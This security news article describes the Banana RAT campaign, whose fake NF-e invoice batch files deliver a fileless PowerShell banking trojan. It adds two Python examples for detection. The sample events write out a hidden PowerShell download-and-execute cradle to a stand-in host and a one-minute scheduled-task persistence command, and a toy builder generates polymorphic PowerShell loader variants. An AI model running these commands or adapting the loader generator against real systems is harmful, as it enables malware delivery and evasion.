Banana RAT uses fake NF-e invoices to target Brazilian banking customers
A Brazilian banking malware campaign is using fake NF-e invoice lures to trick victims into running malicious batch files on Windows systems. The malware, known as Banana RAT, gives attackers remote access for live banking fraud, surveillance, credential theft, and Pix payment manipulation.
The Trend Micro report tracks the activity cluster as SHADOW-WATER-063 and says researchers mapped the full operation by analyzing both attacker-side infrastructure and victim-side malware telemetry.
The attack starts with a file named Consultar_NF-e.bat, which pretends to help the victim check a Brazilian electronic invoice. Once opened, it launches a hidden PowerShell chain that downloads and runs Banana RAT in memory.
Why the NF-e lure works in Brazil
NF-e, or Nota Fiscal Eletrônica, is a familiar part of Brazilian business life. The official NF-e portal publishes information about the national electronic invoice system, and that everyday familiarity is what makes invoice-themed lures credible to local users.
Attackers are abusing that trust. A victim who receives an unexpected invoice file through WhatsApp, a phishing link, or another messaging channel may assume it relates to a purchase, delivery, tax record, or business transaction.
The file name is also carefully chosen. Consultar_NF-e.bat looks like a simple invoice-checking script, but the .bat extension means Windows hands it to cmd.exe as a batch script rather than opening it as a document, so a double-click runs the attacker's commands.
| Attack stage | What happens | Why it matters |
|---|---|---|
| Lure | Victim receives Consultar_NF-e.bat through WhatsApp or a phishing link. | The file mimics a trusted Brazilian invoice workflow. |
| Execution | The batch file runs hidden PowerShell commands. | The victim may not see a normal installer or warning flow. |
| Staging | A script downloads payload.php and msedge.txt from attacker infrastructure. | The chain separates delivery, staging, and final payload execution. |
| In-memory loading | The payload is decrypted and executed without writing the plain malware to disk. | This weakens basic file-based detection. |
| Fraud control | Banana RAT connects to C2 and waits for operator commands. | Attackers can guide real-time banking fraud. |
Banana RAT targets Brazilian banks and crypto platforms
Trend Micro said the operation focuses on Brazilian financial institutions rather than broad global infection. The malware targets 16 major Brazilian banks and several Brazil-localized cryptocurrency exchanges.
That narrow targeting suggests the operators built Banana RAT around local banking behavior, language, payment flows, and user expectations. It also explains why the malware includes a dedicated Pix subsystem.
Pix is Brazil’s instant payment system, managed by Banco Central do Brasil. The official Banco Central Pix page describes Pix as part of Brazil’s financial stability infrastructure, and its widespread use makes it a valuable target for fraud-focused malware.
The malware runs through a fileless PowerShell chain
The initial batch file starts a hidden PowerShell command. That command fetches a small staging script, which then downloads the next payload from attacker-controlled infrastructure.
The second-stage payload, identified as msedge.txt in the research, is encrypted with AES and decrypted in memory. This means the clear-text malware does not need to land on disk as a normal executable file.
The Trend Micro analysis says the malware uses layered obfuscation, AES-wrapped payloads, fileless PowerShell execution, and encrypted command-and-control communication to avoid detection.
Polymorphic builds weaken hash-based detection
Banana RAT’s server-side tooling does not appear to send the same file to every victim. Researchers found a FastAPI-based crypter service that keeps a pool of 100 to 200 ready builds and serves a unique payload for each request.

That design makes traditional hash-based blocking much less effective: if every served sample is byte-unique, a blocklist of known file hashes only ever matches samples that have already been collected, never the next victim's download.
- Each victim request can receive a unique payload.
- The malware uses several obfuscation layers before delivery.
- The final payload decrypts in memory instead of as a plain file.
- The C2 channel uses encrypted communication on port 443.
- The malware can fall back to hardcoded infrastructure if the main domain fails.
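To make the hash-blocking point concrete, here is an added example (not Trend Micro's or the article's code) that models a per-request crypter and shows why a file-hash blocklist misses every later build while a normalization-based "skeleton" hash still matches all of them. The PowerShell loader text inside is an invented stand-in for the real stager, and the toy crypter only randomizes variable names, key, ciphertext blob and a junk comment; it does not reproduce the campaign's FastAPI service or its real obfuscation layers.

```python
# Added example: toy polymorphic builder + skeleton hashing.
# The loader layout is an assumption, not the actual Banana RAT stager.
import base64
import hashlib
import random
import re
import string


def _ident(rng):
    """Random PowerShell-style identifier (6-12 letters)."""
    return "".join(rng.choice(string.ascii_letters) for _ in range(rng.randint(6, 12)))


def build_variant(rng):
    """Emit one byte-unique build: same loader logic every time, but fresh
    variable names, AES key, ciphertext blob and junk comment."""
    k, b, a, p = (_ident(rng) for _ in range(4))
    key = base64.b64encode(rng.randbytes(32)).decode()
    blob = base64.b64encode(rng.randbytes(rng.randint(200, 400))).decode()
    junk = " ".join(_ident(rng) for _ in range(rng.randint(1, 4)))
    return (
        f"# {junk}\n"
        f"${k} = [Convert]::FromBase64String('{key}')\n"
        f"${b} = [Convert]::FromBase64String('{blob}')\n"
        f"${a} = New-Object System.Security.Cryptography.AesManaged\n"
        f"${a}.Key = ${k}\n"
        f"${a}.IV = ${b}[0..15]\n"
        f"${p} = ${a}.CreateDecryptor().TransformFinalBlock(${b}, 16, ${b}.Length - 16)\n"
        f"IEX ([Text.Encoding]::UTF8.GetString(${p}))\n"
    )


def variants(n, seed):
    """Deterministic batch of n builds, as a crypter pool would hand out."""
    rng = random.Random(seed)
    return [build_variant(rng) for _ in range(n)]


RE_COMMENT = re.compile(r"#[^\n]*")
RE_STRING = re.compile(r"'[^']*'|\"[^\"]*\"")
RE_VAR = re.compile(r"\$[A-Za-z_][A-Za-z0-9_]*")
RE_WS = re.compile(r"\s+")


def normalize(script):
    """Strip everything the crypter randomizes: comments, string literals
    (keys/blobs), and variable names, which are renamed in order of first
    appearance so dataflow between them is preserved."""
    s = RE_COMMENT.sub("", script)
    s = RE_STRING.sub("'LIT'", s)
    names = {}

    def rename(m):
        return names.setdefault(m.group(0).lower(), f"$v{len(names)}")

    s = RE_VAR.sub(rename, s)
    return RE_WS.sub(" ", s).strip().lower()


def file_hash(script):
    return hashlib.sha256(script.encode()).hexdigest()


def skeleton_hash(script):
    return hashlib.sha256(normalize(script).encode()).hexdigest()


def compare(n=8, seed=1):
    """Treat the first build as the 'known' sample; see how many of the
    later builds each indicator type catches."""
    known, *later = variants(n, seed)
    hash_blocklist = {file_hash(known)}
    skeleton_list = {skeleton_hash(known)}
    return {
        "later_samples": len(later),
        "caught_by_file_hash": sum(file_hash(v) in hash_blocklist for v in later),
        "caught_by_skeleton": sum(skeleton_hash(v) in skeleton_list for v in later),
    }


if __name__ == "__main__":
    print(compare())
```

The skeleton hash is deliberately coarse (all literals collapse to one token), so in production it belongs alongside behavioral rules rather than as a sole blocking signal; the point is that a normalized structural feature survives byte-level churn that a SHA-256 blocklist does not.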
Banana RAT enables live banking fraud
Once active, Banana RAT gives operators tools for interactive fraud instead of simple background data theft. The malware can stream the victim’s screen, log keystrokes, control input, inject banking overlays, and monitor financial sessions.
The fake overlays are especially important. A victim may see a full-screen message that appears to come from a bank, telling them to wait, complete an update, or scan a code. Meanwhile, the operator can perform actions in the background.
The malware also includes Pix QR code interception. Since Pix payments often use QR codes for fast transfers, the malware can interfere with the payment flow and support real-time account-draining attempts.
Why Pix manipulation increases the risk
Pix is fast, widely used, and built for instant transfers. That convenience also leaves victims and banks a narrow window to respond, because a fraudulent transfer can complete in seconds and is hard to reverse afterwards.
Banana RAT’s Pix-focused features show that the campaign was designed for the Brazilian market. It is not a generic remote access tool with a banking label attached. It includes localized fraud logic for Brazilian financial services.
The use of fake invoice lures, Brazilian Portuguese tooling, targeted bank overlays, and a Pix manipulation subsystem all point to an operation built around local banking habits.
How persistence works
After infection, Banana RAT establishes persistence through a hidden scheduled task. The task relaunches the PowerShell stager on a one-minute interval, so the malware chain survives reboots and is restarted whenever its process is killed.
The malware also hides files in a path designed to look like legitimate Microsoft diagnostic storage. This blending tactic can make suspicious payloads harder to notice during a quick manual review.
| Persistence or evasion method | Purpose |
|---|---|
| Hidden scheduled task | Relaunches the malware chain after infection. |
| PowerShell execution | Runs commands without a traditional visible installer. |
| In-memory decryption | Keeps the clear payload away from normal disk scanning. |
| Microsoft-like directory path | Helps malicious files blend into expected system locations. |
| Polymorphic payload generation | Creates unique samples that resist simple hash blocking. |
What users should watch for
Brazilian users should treat unexpected invoice files with caution, especially when the file arrives through WhatsApp, social media, SMS, or an unknown link. A legitimate invoice flow should not require a user to run a .bat file.
Users should also pay attention during online banking sessions. Full-screen “security update” messages, unexpected QR code prompts, frozen input, or banking pages that behave unusually can indicate active fraud tooling.
- Do not run invoice files with .bat, .cmd, .ps1, .js, .vbs, or .scr extensions.
- Confirm invoices through the sender’s known official channel.
- Use banking apps and official portals directly instead of links from messages.
- Question any banking page that asks you to wait during a “security update.”
- Stop the transaction if a Pix QR code changes unexpectedly.
- Report suspicious banking behavior to the bank immediately.
What security teams should monitor
Security teams in Brazil should monitor for PowerShell stagers, unusual scheduled tasks, payloads written under Microsoft-like diagnostic paths, and outbound traffic to domains that imitate trusted software infrastructure.
Endpoint detection should focus on behavior, not only file names. Banana RAT’s polymorphic build process means one static hash may miss later payloads from the same campaign.
- Alert on batch files launching hidden PowerShell commands.
- Monitor PowerShell downloading scripts from external infrastructure.
- Hunt for msedge.txt, st.txt, st.php, and payload.php artifacts.
- Review scheduled tasks that launch PowerShell every minute.
- Inspect suspicious files under ProgramData Microsoft diagnostic paths.
- Block known Banana RAT C2 and staging infrastructure at the perimeter.
- Use behavior-based rules for screen capture, keylogging, and remote input control.
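The monitoring items above map naturally onto process-creation, file-creation and network telemetry. As an added example (not Trend Micro's or the article's code), the detector below runs those rules over constructed Sysmon-style events and then correlates per host, so a lone PowerShell TLS connection stays low-signal while a batch-to-hidden-PowerShell launch, a download cradle, a staging file and a one-minute task on the same machine are reported together. The staging file names come from the article; the host names, URLs, task name and the exact "diagnostic" directory are assumptions.

```python
# Added example: behavior-based detection of the staged PowerShell chain.
# Field names follow Sysmon conventions (Image, ParentImage, CommandLine,
# TargetFilename); SAMPLE_EVENTS are constructed, not real telemetry.
import re
from collections import defaultdict

# Staging artifacts named in the reporting.
STAGING_NAMES = {"msedge.txt", "st.txt", "st.php", "payload.php"}

RE_SHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
RE_CMD = re.compile(r"\\cmd\.exe$", re.I)          # a .bat runs under cmd.exe
RE_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b", re.I)
RE_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|"
    r"\biex\b|invoke-expression|net\.webclient|start-bitstransfer", re.I)
RE_MINUTE_TASK = re.compile(r"/sc\s+minute\s+/mo\s+1\b", re.I)
# Assumed shape of the "Microsoft diagnostic"-looking drop directory.
RE_DIAG_PATH = re.compile(r"^[a-z]:\\programdata\\microsoft\\[^\\]*diagnos", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (host, rule, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        host, kind = ev["host"], ev["kind"]
        if kind == "process_create":
            img = ev["Image"]
            parent = ev.get("ParentImage", "")
            cmd = ev.get("CommandLine", "")
            if RE_SHELL.search(img):
                if RE_CMD.search(parent) and (RE_HIDDEN.search(cmd) or RE_CRADLE.search(cmd)):
                    alerts.append((host, "batch_to_hidden_powershell", cmd))
                if RE_CRADLE.search(cmd):
                    alerts.append((host, "powershell_download_cradle", cmd))
            if _basename(img) == "schtasks.exe" and RE_MINUTE_TASK.search(cmd) \
                    and re.search(r"powershell|pwsh", cmd, re.I):
                alerts.append((host, "minute_task_launching_powershell", cmd))
        elif kind == "file_create":
            path = ev["TargetFilename"]
            if _basename(path) in STAGING_NAMES or RE_DIAG_PATH.search(path):
                alerts.append((host, "staging_artifact_on_disk", path))
        elif kind == "network_connect":
            if RE_SHELL.search(ev["Image"]) and ev.get("DestinationPort") == 443:
                dest = ev.get("DestinationHostname") or ev.get("DestinationIp", "")
                alerts.append((host, "powershell_tls_egress", dest))
    return alerts


def score_hosts(alerts, threshold=2):
    """Hosts with at least `threshold` distinct rules firing: chain-like activity."""
    rules_by_host = defaultdict(set)
    for host, rule, _ in alerts:
        rules_by_host[host].add(rule)
    return {h: sorted(r) for h, r in rules_by_host.items() if len(r) >= threshold}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; hostnames, URLs, task name and paths are invented
    {"host": "WS-SP-017", "kind": "process_create", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c "C:\Users\ana\Downloads\Consultar_NF-e.bat"'},
    {"host": "WS-SP-017", "kind": "process_create", "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                    "\"IEX (New-Object Net.WebClient).DownloadString('https://staging.example/st.txt')\""},
    {"host": "WS-SP-017", "kind": "file_create", "Image": PS,
     "TargetFilename": r"C:\ProgramData\Microsoft\Diagnosis\msedge.txt"},
    {"host": "WS-SP-017", "kind": "process_create", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": PS,
     "CommandLine": 'schtasks /create /f /sc minute /mo 1 /tn "EdgeDiagnostics" '
                    '/tr "powershell -w hidden -ep bypass -f C:\\ProgramData\\Microsoft\\Diagnosis\\st.txt"'},
    {"host": "WS-SP-017", "kind": "network_connect", "Image": PS,
     "DestinationPort": 443, "DestinationHostname": "c2.example"},
    # Benign admin use on another host: must not reach the correlation threshold.
    {"host": "WS-RJ-042", "kind": "process_create", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"host": "WS-RJ-042", "kind": "network_connect", "Image": PS,
     "DestinationPort": 443, "DestinationHostname": "www.powershellgallery.com"},
]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for host, rule, detail in found:
        print(f"{host:10} {rule:34} {detail[:70]}")
    print("chain-like hosts:", score_hosts(found))
```

The regexes are intentionally narrow to the chain the article describes (cmd.exe parent, hidden window or download cradle, one-minute task, the named staging files); in a real deployment they would be tuned against the environment's own baseline of PowerShell use, and the per-host correlation is what keeps the single-signal rules from paging on every admin script.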
Why invoice-themed malware remains effective
Invoice lures work because they create urgency without looking unusual. Businesses expect invoices, consumers expect purchase records, and many users want to check a possible charge quickly.
In Brazil, NF-e adds another layer of credibility because users regularly encounter electronic invoice workflows. Attackers can exploit that familiarity by making the malware look like a routine document check.
The safest habit is to start from official services or known business portals. Users can search for information through the official NF-e portal rather than running scripts or opening executable invoice files from messages.
The bigger lesson from Banana RAT
Banana RAT shows how regional banking malware continues to evolve. The campaign combines local lures, fileless execution, polymorphic payload generation, encrypted C2, live operator control, and payment-system-specific fraud tools.

That mix makes it harder to stop with one layer of defense. Users need awareness, banks need fraud monitoring, and organizations need endpoint visibility that can detect suspicious PowerShell behavior before the attacker reaches a live banking session.
The campaign also shows why defenders should treat WhatsApp and messaging-app links as part of the phishing surface. Banking malware no longer needs to arrive only through email attachments.
For Brazilian users and financial institutions, the practical response is clear: block the known infrastructure, hunt for the staged PowerShell chain, warn customers about fake invoice files, and treat unexpected banking overlays or Pix QR code changes as urgent fraud signals.
FAQ
What is Banana RAT?
Banana RAT is a Brazilian banking trojan tracked by Trend Micro under the SHADOW-WATER-063 activity cluster. It gives attackers remote fraud capabilities, including screen streaming, keylogging, banking overlays, and Pix QR code manipulation.
How does the Banana RAT campaign infect victims?
The campaign uses a fake NF-e invoice file named Consultar_NF-e.bat. When opened, it launches hidden PowerShell commands that download staged payloads and execute the malware in memory.
Why do attackers use NF-e invoice lures?
NF-e invoices are widely recognized in Brazil, so attackers use them to make malicious files look routine. Victims may open the file because they think they are checking a legitimate tax or purchase document.
How does Banana RAT evade detection?
Banana RAT uses hidden PowerShell execution, AES-wrapped payloads, in-memory decryption, encrypted command-and-control traffic, and polymorphic builds that can make every delivered sample byte-unique.
How can users protect themselves?
Users should avoid running invoice files with executable extensions such as .bat or .ps1, verify invoices through official channels, avoid links from unknown messages, and stop banking activity if fake security overlays or unexpected Pix QR code prompts appear.